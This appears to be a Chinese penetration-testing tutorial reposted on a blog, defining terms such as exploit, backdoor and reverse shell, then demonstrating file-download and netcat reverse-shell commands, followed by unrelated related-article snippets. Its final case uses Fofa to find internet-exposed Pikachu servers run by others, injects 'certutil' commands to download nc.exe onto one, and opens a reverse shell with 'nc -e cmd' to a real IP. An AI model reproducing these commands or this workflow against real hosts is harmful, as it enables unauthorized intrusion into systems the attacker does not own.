01-操作系统_名词_文件下载_反弹

操作系统_名词_文件下载_反弹

  • 一、渗透测试
    • 1.1、POC、EXP、Payload与Shellcode
    • 1.2、后门
    • 1.3、木马
    • 1.4、反弹
    • 1.5、回显
    • 1.6、跳板
    • 1.7、黑白盒测试
    • 1.8、暴力破解
    • 1.9、社会工程学
    • 1.10、撞库
    • 1.11、ATT&CK
  • 二、案例演示
    • 2.1、基础案例1:操作系统-用途&命令&权限&用户&防火墙
      • 2.1.1、Linux常见命令
      • 2.1.2、windows常见命令
        • 2.1.3、文件权限
      • 2.1.3、Linux用户和用户组
        • 2.1.5、自带防火墙出站&入站规则协议
    • 2.2、实用案例1:文件上传下载-解决无图形化&解决数据传输
    • 2.3、反弹shell命令-解决数据回显&解决数据通讯
      • 2.3.1、结合案例1:防火墙绕过-正向连接&反向连接&内网服务器
        • 2.3.1.1、内网
        • 2.3.1.2、防火墙
      • 2.3.2、结合案例2:Fofa拿下同行Pikachu服务器
  • 三、涉及资源

  • 参考视频:https://www.bilibili.com/video/BV1Ay4y1K7X6/?spm_id_from=333.999.0.0&vd_source=93ef4007c464e7143f2a9fb5be297117

一、渗透测试

1.1、POC、EXP、Payload与Shellcode

  • POC:全称 ’ Proof of Concept ',中文 ’ 概念验证 ’ ,常指一段漏洞证明的代码。

  • EXP:全称 ’ Exploit ',中文 ’ 利用 ',指利用系统漏洞进行攻击的动作。

  • Payload:中文 ’ 有效载荷 ',指成功exploit之后,真正在目标系统执行的代码或指令。

  • Shellcode:简单翻译 ’ shell代码 ',是Payload的一种,由于其建立正向/反向shell而得名。

  • 几点注意

    • POC是用来证明漏洞存在的,EXP是用来利用漏洞的,两者通常不是一类,或者说,PoC通常是无害的,Exp通常是有害的,有了POC,才有EXP。
    • Payload有很多种,它可以是Shellcode,也可以直接是一段系统命令。同一个Payload可以用于多个漏洞,但每个漏洞都有其自己的EXP,也就是说不存在通用的EXP。
    • Shellcode也有很多种,包括正向的,反向的,甚至meterpreter。
    • Shellcode与Shellshcok不是一个,Shellshock特指14年发现的Shellshock漏洞。

1.2、后门

  • 这是一种形象的比喻,入侵者在利用某些方法成功的控制了目标主机后,可以在对方的系统中植入特定的程序,或者是修改某些设置,用于访问、查看或者控制这台主机。
  • 这些改动表面上是很难被察觉的,就好象是入侵者偷偷的配了一把主人房间的钥匙,或者在不起眼处修了一条按到,可以方便自身随意进出。
  • 通常大多数木马程序都可以被入侵者用于创建后门(BackDoor)。
  • Webshell:专门针对web应用(网站)的后门。

1.3、木马

  • 就是那些表面上伪装成了正常的程序,但是当这些程序运行时,就会获取系统的整个控制权限。
  • 有很多黑客就是热衷使用木马程序来控制别人的电脑,比如灰鸽子、Gh0st、PcShare等等。

1.4、反弹

  • 反弹shell是一种网络攻击技术,其基本思想是将受害者的命令行交互(input-output)传输到攻击者的机器上,使得攻击者能够主动地与受害者的系统建立连接并进行控制。

1.5、回显

  • 回显通常指的是显示正在执行的命令及其执行结果的过程。

1.6、跳板

  • 跳板,简单来说,就是为了隐藏自己的地址,让别人无法查找到自己的位置。
  • 通过跳板的使用,可以减少他人查找到你的可能性,同时也增加了被发现的难度。举个简单例子,你在A朋友家玩儿,发现了通往B朋友家的后门,然后你来到了B朋友家,又发现了C朋友家的厨房是和B朋友家相连的,你就顺便来到了C朋友的家,同时C朋友家的厕所又是和D朋友家相连。你在A朋友家做了一些事情,比如设置和修改。A朋友回家了,他会发现有人进了自己的家,但是他顺着路线可以找到B朋友家,通过长期的寻找,终于找到了C朋友家,但他遇见难题了,他并不知道是B朋友家的人动了自己的东西,还是D朋友家的人动了自己的东西。这时,你就是安全的了。这中间的各种朋友关系,其实就是你的跳板。通过这种跳板的转换,我们可以改变自己上网的IP位置,隐藏自己的真实物理位置。

1.7、黑白盒测试

  • 白盒测试:是指实际运行被测程序,通过程序的源代码进行测试而不使用用户界面。这种类型的测试需要从代码句法发现内部代码在算法、溢出、路径和条件等方面的缺点或者错误,进而加以修正。
  • 黑盒测试:又称功能测试、数据驱动测试或基于规格说明的测试,是通过使用整个软件或某种软件功能来严格地测试,,而并没有通过检查程序的源代码,或者很清楚地了解该软件的源代码程序具体是怎样设计的。测试人员通过输入他们的数据看输出的结果,从而了解软件怎样工作。应该更适合测试网页游戏。

1.8、暴力破解

  • 是一种常见的网络安全攻击方法,它利用计算机程序自动尝试大量的密码组合来破解密码。

1.9、社会工程学

  • 为某些非容易的获取讯息,利用社会科学(此指其中的社会常识)尤其心理学,语言学,欺诈学将其进行综合,有效的利用,并以获得信息为最终目的学科称为“社会工程学”总体上来说,社会工程学就是使人们顺从你的意愿、满足你的欲望的一门艺术与学问。

1.10、撞库

  • 撞库是黑客通过收集互联网已泄露的用户和密码信息,生成对应的字典表,尝试批量登陆其他网站后,得到一系列可以登录的用户。
  • 很多用户在不同网站使用的是相同的帐号密码,因此黑客可以通过获取用户在A网站的账户从而尝试登录B网址,这就可以理解为撞库攻击。

1.11、ATT&CK

  • 可以简单理解为描述攻击者技战术的知识库。
  • MITRE在2013年推出了该模型,它是根据真实的观察数据来描述和分类对抗行为。
  • ATT&CK将已知攻击者行为转换为结构化列表,将这些已知的行为汇总成战术和技术,并通过几个矩阵以及结构化威胁信息表达式(STIX)、指标信息的可信自动化交换(TAXII)来表示。

二、案例演示

2.1、基础案例1:操作系统-用途&命令&权限&用户&防火墙

2.1.1、Linux常见命令

  • https://blog.csdn.net/liangpingguo/article/details/79140780

2.1.2、windows常见命令

  • https://www.cnblogs.com/air-of-code/p/6015590.html
2.1.3、文件权限
  • https://blog.csdn.net/Cyan_Jiang/article/details/129472605

2.1.3、Linux用户和用户组

  • https://www.cnblogs.com/auguse/articles/11627325.html
2.1.5、自带防火墙出站&入站规则协议
  • https://www.cnblogs.com/whalesea/p/11451604.html
  • https://blog.csdn.net/weixin_53009585/article/details/129472804

2.2、实用案例1:文件上传下载-解决无图形化&解决数据传输

Linux:wget curl python ruby perl java
Windows:PowerShell Certutil Bitsadmin msiexec mshta rundll32

在这里插入图片描述

  • https://forum.ywhack.com/bountytips.php?download
    在这里插入图片描述
    在这里插入图片描述

2.3、反弹shell命令-解决数据回显&解决数据通讯

useradd 用户名 passwd 用户名
测试Linux系统添加用户或修改密码命令交互回显问题

2.3.1、结合案例1:防火墙绕过-正向连接&反向连接&内网服务器

2.3.1.1、内网
内网 -> xiaodi8
  • 内网:

    • 获取xiaodi8.com的IP地址:47.75.212.155
      在这里插入图片描述
    • nc -e cmd 47.75.212.155 5577 通过使用 nc 工具,连接到指定的 IP 地址和端口号,并在远程主机上执行一个命令行 shell(将当前终端发送到远程主机上)。
      在这里插入图片描述
  • xiaodi8:

    • 使用nc监听主机端口 5577
      在这里插入图片描述
  • 内网的IP地址:
    在这里插入图片描述

  • 此时在xiaodi8上查看IP地址(xiaodi8获取到内网的终端):
    在这里插入图片描述

xiaodi8! -> 内网
  • 内网:

    • IP地址:192.168.46.157
  • xiaodi8:

    • nc -e cmd 192.168.146.157 5577
      在这里插入图片描述
  • 内网:

    • 监听端口5577,没有监听到信息(解决办法:端口映射)
      在这里插入图片描述
2.3.1.2、防火墙
xiaodi8 <- aliyun
  • xiaodi8:

    • 发送终端到47.94.236.117的5566端口
      在这里插入图片描述
  • aliyun:

    • 打开端口监听,监听到信息
      在这里插入图片描述
    • 发送终端到www.xiaodi8.com的5566端口(命令和nc的效果一样)
      在这里插入图片描述
  • xiaodi8:

    • 监听端口,获取到信息:
      在这里插入图片描述
aliyun !-> xiaodi8防火墙	# 以aliyun为基准看,正向连接

正向连接是受害主机监听一个端口,由控制主机主动去连接受害主机的过程,适用于受害主机具有公网ip的情况下。

  • xiaodi8:

    • 打开防火墙:
      在这里插入图片描述
  • aliyun:

  • 发送终端到www.xiaodi8.com的5566端口(命令和nc的效果一样)
    在这里插入图片描述

  • xiaodi8:

    • 监听端口,没有获取到信息:
      在这里插入图片描述
xiaodi8防火墙- > aliyun	# 以aliyun为基准看,反向连接

反向连接是控制主机监听一个端口,由受害主机反向去连接控制主机的过程,适用于受害主机出网(或出网且没有公网ip)的情况。

  • xiaodi8:

    • 发送终端到aliyun的5566端口
      在这里插入图片描述
  • aliyun:

    • 进行监听,监听到信息:
      在这里插入图片描述

2.3.2、结合案例2:Fofa拿下同行Pikachu服务器

  • 文件下载&反弹shell:
certutil -urlcache -split -f http://www.xiaodi8.com/nc.exe nc.exe
nc -e cmd 47.75.212.155 5566
  • 使用Fofa搜索Pikachu:
    在这里插入图片描述
    在这里插入图片描述

  • 测试Pikachu的命令执行漏洞是否能够执行命令:
    在这里插入图片描述
    在这里插入图片描述

  • 不行,换下一个:
    在这里插入图片描述

  • 找到一个可以执行的网站:
    在这里插入图片描述

  • 127.0.0.1 & ipconfig
    在这里插入图片描述

  • 接下来的思路是:将nc上传到对方的主机上去,再执行命令反弹回来

  • 127.0.0.1 & dir 查看文件夹:
    在这里插入图片描述

  • 127.0.0.1 & certutil -urlcache -split -f http://www.xiaodi8.com/nc.exe nc.exe 上传文件
    在这里插入图片描述

  • nc -e cmd 47.75.212.155 5566 反弹shell到自己的服务器端口:
    在这里插入图片描述

  • 在自己的主机上开启监听,成功获取到shell:
    在这里插入图片描述

三、涉及资源

  • https://www.cnblogs.com/sunny11/p/13583083.html
  • https://forum.ywhack.com/bountytips.php?download
  • https://forum.ywhack.com/reverse-shell/
  • https://blog.csdn.net/weixin_43303273/article/details/83029138

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/667474.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Android学习之路(27) ProGuard,混淆,R8优化

前言 使用java编写的源代码编译后生成了对于的class文件&#xff0c;但是class文件是一个非常标准的文件&#xff0c;市面上很多软件都可以对class文件进行反编译&#xff0c;为了我们app的安全性&#xff0c;就需要使用到Android代码混淆这一功能。 针对 Java 的混淆&#x…

【Docker】Docker Registry(镜像仓库)

文章目录 一、什么是 Docker Registry二、镜像仓库分类三、镜像仓库工作机制四、常用的镜像仓库五、常用命令镜像仓库命令镜像命令(部分)容器命令(部分) 六、docker镜像仓库实战综合实战一&#xff1a;搭建一个 nginx 服务综合实战二&#xff1a;Docker hub上创建自己私有仓库综…

B站课程评分

Spring6 https://www.bilibili.com/video/BV1Ft4y1g7Fb/ 评价: 推荐一看 配套文档优秀, 老师口齿清晰, 条理不错. mybatis https://www.bilibili.com/video/BV1JP4y1Z73S/?spm_id_from333.337.search-card.all.click 评价: 推荐一看 配套文档优秀, 老师口齿清晰, 条理不错…

等变和不变 、向量神经元(vector neurons)是什么?

等变和不变 等变&#xff1a;如果输入是一个旋转后的椅子&#xff0c;那么输出也应该是一个旋转后的椅子 不变&#xff1a;如果输入是一个旋转后的椅子&#xff0c;那么输出应该是一个椅子&#xff0c;而不是一只狗。 向量神经元&#xff08;vector neurons&#xff09; 向量…

如何监控摄像头是否在线?有什么工具推荐

WGCLOUD监控系统 我们项目中&#xff0c;摄像头用的WGCLOUD监控系统来监控的&#xff0c;主要两种方式来监控 一种是监控摄像头的端口&#xff0c;使用WGCLOUD的端口监控模块 一种是PING摄像头的IP&#xff0c;使用WGCLOUD的ping监测模块 这两种方式比较简单&#xff0c;也…

1997-2022年中央对各省份一般公共预算转移支付数据

1997-2022年中央对各省份一般公共预算转移支付数据 1、时间&#xff1a;1997-2022年 2、范围&#xff1a;31省 3、指标&#xff1a;一般公共预算转移支付 4、来源&#xff1a;wind 财政部 5、指标解释&#xff1a;一般性转移支付又称体制性转移支付&#xff0c;是指上级政…

【2024.2.4练习】国王游戏

题目描述 题目思路 涉及排列组合求最优解问题&#xff0c;数据大考虑是否满足某种贪心策略。 假设不除以右手的数字&#xff0c;那么获得金币数量最多的显然为最后一个人。左手数字最大的应排在最后一位。在右手有数字的情况下&#xff0c;不妨也尝试从最后一个人开始排。 假…

Element UI+Spring Boot进行CRUD的实例

ElementUI安装与使用指南 前端代码&#xff1a;点击查看learnelementuispringboot项目源码 后端代码&#xff1a;点击查看 LearnElementUiAndSpringBoot 一、前端配置 安装axios axios官网axios中文文档安装指令&#xff1a;npm install axios 二、后端配置 springboot3m…

BLIP2——采用Q-Former融合视觉语义与LLM能力的方法

BLIP2——采用Q-Former融合视觉语义与LLM能力的方法 FesianXu 20240202 at Baidu Search Team 前言 大规模语言模型&#xff08;Large Language Model,LLM&#xff09;是当前的当红炸子鸡&#xff0c;展现出了强大的逻辑推理&#xff0c;语义理解能力&#xff0c;而视觉作为人…

YOLOv8进阶 | 如何用yolov8训练自己的数据集(以安全帽佩戴检测举例)

前言&#xff1a;Hello大家好&#xff0c;我是小哥谈。YOLOv8是一种目标检测算法&#xff0c;它是YOLO&#xff08;You Only Look Once&#xff09;系列算法的最新版本。本节课就带领大家如何基于YOLOv8来训练自己的目标检测模型&#xff0c;本次作者就以安全帽佩戴检测为案例进…

华为机考入门python3--(7)牛客7-取近似值

分类&#xff1a;数字 知识点&#xff1a; str转float float(str) 向上取整 math.ceil(float_num) 向下取整 math.floor(float_num) 题目来自【牛客】 import math def round_to_int(float_num): # 如果小数点后的数值大于等于0.5&#xff0c;则向上取整&#xf…

Fink CDC数据同步(一)环境部署

1 背景介绍 Apache Flink 是一个框架和分布式处理引擎&#xff0c;用于在无边界和有边界数据流上进行有状态的计算。Flink 能在所有常见集群环境中运行&#xff0c;并能以内存速度和任意规模进行计算。 Flink CDC 是 Apache Flink 的一组源连接器&#xff0c;基于数据库日志的…

【SpringBoot】RBAC权限控制

&#x1f4dd;个页人主&#xff1a;五敷有你 &#x1f525;系列专栏&#xff1a;SpringBoot⛺️稳重求进&#xff0c;晒太阳 权限系统与RBAC模型 权限 为了解决用户和资源的操作关系&#xff0c; 让指定的用户&#xff0c;只能操作指定的资源。 权限功能 菜单权限&a…

windows下安装go

下载golang Go 官网下载地址&#xff1a; https://golang.org/dl/ Go 官方镜像站&#xff08;推荐&#xff09;&#xff1a; https://golang.google.cn/dl/ 选择安装包 验证有没有安装成功 查看 go 环境 说明 &#xff1a; Go1.11 版本之后无需手动配置环境变量&#xff0c…

29 python快速上手

Python操作MySQL和实战 1. 事务1.1 MySQL客户端1.2 Python代码 2. 锁2.1 排它锁2.2 共享锁 3. 数据库连接池4. SQL工具类4.1 单例和方法4.2 上下文管理 5.其他总结 目标&#xff1a;掌握事务和锁以及Python操作MySQL的各种开发必备知识。 概要&#xff1a; 事务锁数据库连接池…

Weblogic反序列化漏洞分析之CVE-2021-2394

目录 简介 前置知识 Serializable示例 Externalizable示例 联系weblogic ExternalizableLite接口 ExternalizableHelperl类 JdbcRowSetImpl类 MethodAttributeAccessor类 AbstractExtractor类 FilterExtractor类 TopNAggregator$PartialResult类 SortedBag$Wrappe…

【测试运维】web自动化全知识点笔记第1篇:什么是Web自动化测试(已分享,附代码)

本系列文章md笔记&#xff08;已分享&#xff09;主要讨论Web自动化测试相关知识。了解什么是自动化&#xff0c;理解什么是自动化测试以及为什么要使用自动化测试。具体包含&#xff1a;WebDriver的基本操作&#xff0c;WebDriver的鼠标、键盘操作&#xff0c;下拉选择框、警告…

【教学类-46-01】吉祥字门贴1.0(华光通心圆_CNKI 文本框 空心字涂色,最好繁体字)

作品展示 背景需求&#xff1a; 马上就要过年了&#xff0c;家家户户大门上贴上对联和福字 我想用正方形红色手工纸&#xff08;15CM&#xff09;也做一个幼儿描线版的福字 问题一&#xff1a;福字顺时针旋转45度 打印纸上制作福字&#xff0c;需要让这个字顺时针旋转45度&am…

【C++栈和队列:数据结构中的经典组合,高效处理先进先出与后进先出问题的最佳方案】

[本节目标] 1. stack的介绍和使用 2. queue的介绍和使用 3. priority_queue的介绍和使用 4. 容器适配器 1. stack的介绍和使用 1.1 stack的介绍 1. stack是一种容器适配器&#xff0c;专门用在具有后进先出操作的上下文环境中&#xff0c;其删除只能从容器的一端进行元素的…

【DC渗透系列】DC-2靶场

arp先扫 ┌──(root㉿kali)-[~] └─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 00:0c:29:6b:ed:27, IPv4: 192.168.100.251 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.100.1 00:50:56:c0:00:08 VMware, In…